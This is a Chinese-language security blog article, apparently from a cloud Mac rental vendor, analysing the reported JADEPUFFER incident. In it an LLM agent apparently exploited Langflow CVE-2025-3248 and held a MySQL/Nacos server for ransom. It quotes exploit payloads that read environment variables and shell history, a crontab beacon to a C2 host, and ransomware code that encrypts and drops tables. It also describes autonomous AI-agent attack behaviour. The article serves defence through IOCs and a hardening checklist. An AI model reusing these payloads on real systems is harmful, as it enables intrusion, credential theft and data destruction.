JADEPUFFER 事件全解析
首例 AI Agent 自主勒索攻击与 Langflow CVE-2025-3248 防御指南(2026)

TL;DR:2026 年 7 月 1 日,云安全公司 Sysdig 威胁研究团队(TRT,Michael Clark)首次公开披露代号 JADEPUFFER 的攻击活动——这是目前已知第一例端到端、完全由大语言模型驱动的完整勒索操作,并正式提出 Agentic Threat Actor(ATA,智能体威胁行为者) 概念。攻击从公网暴露的 LangflowCVE-2025-3248 未鉴权 RCE)切入,横向移动至运行 MySQL + 阿里巴巴 Nacos 的生产服务器,在压缩时间窗口内执行 600+ 条有明确目的的 payload。本文按源文档 11 章结构完整还原:时间线、漏洞技术细节、两阶段攻击链、四条「自主性」证据、比特币地址悬案、IOC、官方防御建议、行业反应与 Sysdig 结论,并给出六步落地防御清单。

01

JADEPUFFER 是什么?ATA 时代的第一声警钟

Sysdig 将 JADEPUFFER 定义为 Agentic Threat Actor(ATA)——即「攻击能力由 AI Agent 交付,而非人工驱动的工具集」。核心定性:从踩点侦察、凭证窃取、横向移动、权限维持,到最终的破坏性加密和勒索信投递,全程没有人类在关键节点手动操作

两阶段目标清晰分工:

  • 入口机:一台公网暴露的 Langflow 实例(通过 CVE-2025-3248 拿下)
  • 真正目标:另一台公网暴露、运行 MySQL 数据库 + 阿里巴巴 Nacos 配置中心的生产服务器

部分媒体于 7 月 6 日跟进报道,但一手技术细节(含原始 payload 代码与 IOC)目前仍以 Sysdig 7 月 1 日报告为唯一完整信源,交叉印证 BleepingComputer、Dark Reading、CyberScoop、CSO Online、Security Affairs 等。

完整时间线

时间事件
2025 年 4 月Langflow 曝出 CVE-2025-3248(未鉴权代码注入/RCE)
2025 年 5 月 5 日该漏洞被 CISA 列入「已知被利用漏洞」(KEV)目录
2025 年同一漏洞被用于投递 Flodrix 僵尸网络(Trend Micro 独立披露,与 JADEPUFFER 无关但共享入口)
2026 年 6 月JADEPUFFER 对公网 Langflow 发起攻击,完整攻击链在数周内分多个会话执行
2026 年 7 月 1 日Sysdig 发布完整技术报告,首次公开披露
2026 年 7 月 2–6 日Dark Reading、BleepingComputer、CyberScoop、CSO Online、Security Affairs 等相继跟进
warning

痛点拆解:AI Agent 编排服务器(Langflow 等)常被仓促上线、直接暴露公网,环境变量里存放 OpenAI/Anthropic/DeepSeek/Gemini API Key 及阿里云/AWS 云凭证——这正是 JADEPUFFER 盯上 Langflow 的原因。

02

CVE-2025-3248 完整技术分析:CVSS 9.8 的「代码校验」陷阱

项目详情
组件Langflow —— 开源可视化 AI Agent 工作流框架,GitHub 星标 7 万+
漏洞类型CWE-94(代码注入)+ CWE-306(关键功能缺失身份验证)
CVSS9.8 Critical,向量 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影响版本Langflow 1.3.0 之前所有版本
漏洞位置/api/v1/validate/code 接口
修复版本1.3.0(新增身份校验)
EPSS 被利用概率91.42%(SentinelOne 数据)

漏洞成因逐步拆解:

  1. 1

    Langflow 提供「代码校验」接口,让用户在可视化编排界面提前校验自定义函数节点语法。

  2. 2

    实现方式:ast.parse()compile()exec()完全没有身份认证,也没有任何沙箱隔离

  3. 3

    Python 特性:函数定义时的装饰器与默认参数在「定义」时即被立即求值,攻击者把恶意代码写进默认参数或装饰器,一旦 Langflow 拿去 compile+exec 做「校验」,恶意代码已执行完毕。

  4. 4

    结果:无需登录、无需权限,一个精心构造的 HTTP POST 即可 RCE

Flodrix 僵尸网络 vs JADEPUFFER(重要区分)

Trend Micro 追踪的 Flodrix(LeetHozer 家族演化变种)是另一起独立利用活动,共享 CVE-2025-3248 入口但属传统脚本化投递。典型 payload 形态(嵌入函数默认参数,通过 raise Exception 回显命令结果):

python
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')
# ... 最终下载 700 字节 Bash 脚本 → Flodrix ELF 二进制,组建 DDoS 僵尸网络

Langflow 1.3.0 补丁为 post_validate_code 新增 _current_user: CurrentActiveUser 依赖注入:校验 JWT Bearer Token 或 x-api-key,失败直接 401/403,请求永不到达漏洞逻辑。

维度漏洞版本(<1.3.0)修复版本(≥1.3.0)
/api/v1/validate/code未鉴权,任意 RCEJWT / x-api-key 强制校验
公网暴露风险EPSS 91.42%,长期被扫描武器化须同时升级 + 网络隔离
典型滥用Flodrix 僵尸网络 + JADEPUFFER ATA
03

Phase 1:Langflow 主机攻陷——侦察、MinIO 与持久化

全部 payload 以 Base64 编码 Python 代码经 Langflow RCE 端点投递。拿到执行权限后,LLM 并行执行多类敏感信息扫描:

  • 大模型 API Key:OpenAI、Anthropic、DeepSeek、Gemini
  • 云服务凭证:ALIBABA_ALIYUN_TENCENT_HUAWEI_ 及 AWS/GCP/Azure
  • 加密货币钱包与助记词、数据库凭证与配置文件

Agent 导出 Langflow 自身 PostgreSQL 后端数据库(窃取凭证与用户记录),暂存本地审阅后删除痕迹;扫描内网地址空间与具名服务,用默认凭证探测数据库、对象存储与密钥库。

MinIO 枚举:自适应「探测-遇错-调整」闭环

探测 minio.internal:9000127.0.0.1:9000,使用默认凭证 minioadmin:minioadmin 完整枚举 Bucket,发现 terraform-state 桶后定向提取 credentials.json。值得注意的自适应细节:第一次请求带 ?format=json 却收到 XML 响应,下一条 payload 立即改用 XML 解析器重新请求——典型 Agent 行为,非固定脚本死板重试。

python
# 枚举全部 Bucket(Sysdig 取证片段)
creds = base64.b64encode(b"minioadmin:minioadmin").decode()
req = urllib.request.Request("http://127.0.0.1:9000/")
req.add_header("Authorization", "Basic " + creds)
# ... ListBuckets → 发现 terraform-state → GetObject credentials.json

# 持久化:crontab 每 30 分钟信标外联
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
04

Phase 2:MySQL + Nacos 生产服务器——31 秒修复、加密与大规模破坏

真正目标是另一台同样暴露在公网、运行 MySQL + 阿里巴巴 Nacos 的生产服务器。Nacos 鉴权体系有 CVE-2021-29441 绕过历史,且默认 JWT 签名密钥自 2020 年起被公开文档记录,很多部署至今未更换。

Agent 使用 root 凭证直接连接暴露的 MySQL 端口——这组凭证来源不明,Sysdig 未观察到从受害者环境窃取,是少数「可能由人类预先准备」的环节之一。

Nacos 后门管理员:31 秒教科书级修复

时间(UTC)动作
19:34:24subprocess 生成 bcrypt 哈希,插入 xadmin 管理员
19:34:36尝试 xadmin:Xploit@2026# 登录失败
19:34:4812 秒后并行测试 nacos:nacos 默认凭证并重新生成 admin123 哈希
19:35:07放弃 subprocess,改用 import bcrypt,删除损坏记录后重建
19:35:18登录成功——总耗时 31 秒

Agent 同时尝试:CVE-2021-29441 鉴权绕过、默认 JWT 密钥伪造 Token、借助 root 数据库权限向后端库注入后门管理员。

容器逃逸探测(约 8 分钟)与破坏性加密

利用 MySQL INTO OUTFILE / LOAD_FILE 系统性测试写入能力、读取 /var/run/docker.sock/proc/1/cgroup/etc/hostname 及 UDF 提权路径。进入勒索前主动写下「完成标记」——Sysdig 指出这更像 Agent 完成任务后发出进入下一阶段的信号,而非人类预设脚本。

Agent 将全部 1,342 条 Nacos 配置项用 AES_ENCRYPT() 加密,删除 config_infohis_config_info,创建勒索信表 README_RANSOM

python
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
print("Encryption key:", KEY)  # 仅打印一次,从未存储或外传

cur.execute("CREATE TABLE config_info_enc AS SELECT ... AES_ENCRYPT(content, KEY) ...")
cur.execute("DROP TABLE config_info")
cur.execute("CREATE TABLE README_RANSOM (...)")
# 比特币: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
# 联系: e78393397[@]proton[.]me
warning

关键细节:勒索信声称 AES-256,但 MySQL AES_ENCRYPT() 默认实为 AES-128-ECB。加密密钥临时生成、只打印到 stdout、从未外传——即便受害者付款,攻击者自己也拿不出解密密钥,数据已实质性永久丢失。两分钟后 Agent 又发出 payload 将数字精修为「全部 1342 项已加密」。

随后升级到直接 DROP DATABASE,代码注释里写下 ROI 优先级排序。外键约束导致静默失败时,下一条 payload 自动加上 SET GLOBAL FOREIGN_KEY_CHECKS=0——Sysdig 强调这要求「理解为什么删除会失败」,而非无脑重试。注释中出现的 IP 64.20.53[.]230(InterServer)仅作 Agent 自我陈述「已备份」,Sysdig 无独立证据证实数据外泄

05

四条自主性证据、比特币悬案、IOC 与行业反应

Sysdig 支撑「LLM 驱动」的四条独立证据线

  1. 1

    自我叙事的代码:payload 里充斥自然语言注释,解释每一步「为什么」——包括 ROI 排序、哪个数据库最大。这些注释原生存在于攻击者代码,非研究人员事后推断。

  2. 2

    机器速度的故障诊断与修正:Nacos 后门 31 秒修复、MinIO XML/JSON 自适应切换、JWT 路径遇阻即放弃——人类操作员读懂错误、定位 PATH 问题、写修复脚本远超 31 秒。

  3. 3

    对自然语言上下文的理解:解析目标环境中自由文本上下文,采取「只有真正读懂才会做」的动作,在相隔数周的不同会话中反复出现。

  4. 4

    比特币地址悬案:见下文——本身构成 AI 自主性给攻击溯源带来不确定性的缩影。

比特币地址悬案

勒索信地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 是 Bitcoin Core 文档中反复使用的标准 P2SH 格式示例地址,大量存在于大模型训练语料。链上数据显示该地址历史有 737 笔交易、累计约 46 枚比特币、当前余额为零。Sysdig 给出两种无法区分的解读:(a) LLM「幻觉」生成示例地址,钱包属第三方专门打扫误转存款;(b) 攻击者配置的真实可控钱包,恰好与示例地址重合。

IOC(入侵指标)汇总

类型指标
C2 / 信标45.131.66[.]106(crontab:hxxp://45.131.66[.]106:4444/beacon
数据暂存64.20.53[.]230(InterServer,AS19318,仅 Agent 自述)
入口漏洞CVE-2025-3248(Langflow 未鉴权 RCE)
勒索比特币3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
勒索邮箱e78393397[@]proton[.]me(威胁情报库无命中,格式与已知 MySQL 勒索团伙不同)
勒索表名README_RANSOM(与 WARNING / RECOVER_YOUR_DATA 等惯用表名均不匹配)
持久化crontab 每 30 分钟向 C2 4444 端口信标外联

Sysdig 指出:勒索邮箱与表名看似符合人类勒索软件惯例,实则查无先例,进一步支持「全新 Agent 驱动操作」而非已知团伙常规套路。

行业与专家反应

BleepingComputer、Dark Reading、CyberScoop、Security Affairs 等普遍称其为「首例完全由 AI 驱动的勒索攻击」,强调 ATA 时代到来。CSO Online 采访红队专家 Vibhum Dubey 给出更审慎视角:

「我更倾向于把这看作是『执行方式上的演进』,而不是一种全新的勒索技术。真正值得担心的不是最后的加密阶段,而是加密之前那段『安静期』——Agent 悄悄摸清身份体系、权限关系和信任链条,同时规避被发现。」

多家媒体同时提到 LLMjacking:若攻击者靠窃取凭证驱动 Agent,发起复杂多阶段攻击的边际成本趋近于零——这是本次事件最值得警惕的经济学信号。

Sysdig 四点结论与意义

  • 勒索软件不再是「高技能者的手艺」:LLM Agent 可串联侦察到破坏全链路,操作者无需深厚专业知识。
  • 老漏洞正在被自动化武器化:2021 年 Nacos 鉴权绕过 + 未更换默认密钥,Agent 让「把整个历史漏洞库挨个喷一遍」成本几乎为零。
  • 意图变得「可读」——也是防守方机会:LLM 在 payload 里叙述目标,客观上提供此前不曾有过的检测抓手。
  • 「已备份」只是攻击者一面之词:加密密钥不可恢复,受害者即便付款也无法找回配置数据。

报告结尾强调:用到的每一项单独技术都不新、不复杂;真正值得关注的是 AI 模型把这些技术串成完整勒索操作,针对本就被忽视的公网基础设施。运行勒索软件的技能门槛已降到「运行一个 Agent 的成本」,而 LLMjacking 让攻击者边际成本几乎为零。

06

六步防御 Runbook 与可引用硬核数据

  1. 01

    升级 Langflow 至 ≥1.3.0,修复 CVE-2025-3248;不要把代码执行/校验类端点暴露在公网

  2. 02

    API Key 与云凭证隔离:勿在 AI 编排服务器运行环境存放 LLM 厂商 API Key 或云凭证,托管到专门密钥管理服务。

  3. 03

    加固 Nacos:更换默认 token.secret.key,升级强制自定义密钥版本;永远不要将 Nacos 暴露公网,勿以 root 连接后端数据库。

  4. 04

    数据库暴露面:管理员账号永不暴露公网;管理端口强制强唯一凭证与来源 IP 限制。

  5. 05

    出站流量控制(egress control):被攻陷主机无法任意信标外联或访问外部暂存服务器;监控 crontab 计划任务与外网请求。

  6. 06

    运行时威胁检测 + IOC 监控:识别数据库进程恶意行为;关注上述 IOC 与异常 User-Agent。参考本站 OpenClaw Gateway 最小暴露面远程 Mac AI Agent 最佳实践

  • 攻击规模:Sysdig 捕获 600+ 条独立、有明确目的的 payload,压缩时间窗口内连贯执行。
  • 加密规模:1,342 条 Nacos 配置项被加密后删表。
  • CVE-2025-3248 EPSS:91.42% 被利用概率;CISA KEV 收录于 2025-05-05。
  • Nacos 修复耗时:从登录失败到成功仅 31 秒,15 行修复 payload 完成删除-诊断-重建闭环。

对团队而言,在本地笔记本或公网 VPS 上裸跑 Langflow / OpenClaw 等 AI Agent 编排,意味着 API Key、云凭证与生产数据库处于同一信任域——JADEPUFFER 已证明这种架构的灾难性后果。在独立远程 Mac 节点上隔离 Agent 开发与 CI 工作负载、配合密钥托管与出站控制,对 iOS CI/CD 与 AI Agent 自动化生产环境通常是更稳的选择。本地 Mac 算力有限、又需 7×24 常驻 Agent 时,NodeMini 的 Mac Mini 云端租赁提供独占 Apple Silicon 节点与 root 权限,适合把高权限 Agent 从个人设备与公网编排服务中剥离。详见 租赁价格说明

info

参考信源:Sysdig《JADEPUFFER: Agentic ransomware for automated database extortion》;BleepingComputer;Dark Reading;CyberScoop;CSO Online(Vibhum Dubey);Security Affairs;Trend Micro(CVE-2025-3248 / Flodrix);NVD / SentinelOne / Zscaler;CISA KEV 目录。

FAQ

常见问题

不是。两者共享 CVE-2025-3248 入口漏洞,但 Flodrix 是 Trend Micro 披露的传统脚本化僵尸网络投递;JADEPUFFER 才是 Sysdig 披露的 LLM Agent 自主驱动勒索操作。共同说明该漏洞长期被公网扫描武器化。

Sysdig 在本报告中正式提出的分类:攻击能力由 AI Agent 交付,而非人工驱动的工具集。JADEPUFFER 是首个被完整取证的 ATA 勒索案例——从侦察到加密全程由 LLM 在关键节点自主决策。

极可能不能。加密密钥由 uuid4() 随机生成、仅打印到 stdout、从未存储或外传;MySQL AES_ENCRYPT 实际为 AES-128-ECB 而非勒索信声称的 AES-256。数据已实质性永久丢失。

立即升级至 ≥1.3.0;将实例移出公网或置于 VPN/零信任之后;从运行环境移除 API Key 与云凭证,改用密钥管理服务;检查 crontab 与 IOC 列表中的 C2 地址。需要隔离 Agent 开发环境时可查看 帮助中心

若攻击者本身靠窃取来的 LLM/云凭证驱动 Agent 运作,发起多阶段攻击的边际成本趋近于零。JADEPUFFER Phase 1 即大规模扫描 OpenAI、Anthropic、阿里云等 API Key——这正是 LLMjacking 经济学与 ATA 结合的警示信号。

遵循 Sysdig 七条防御建议;在独立远程 Mac 节点上运行 Agent 工作负载,与生产数据库和桌面环境隔离。NodeMini 提供独占 Mac Mini M4 租赁与 root 权限,适合 iOS CI/CD 与 Agent 自动化。查看 Mac Mini 云端租赁价格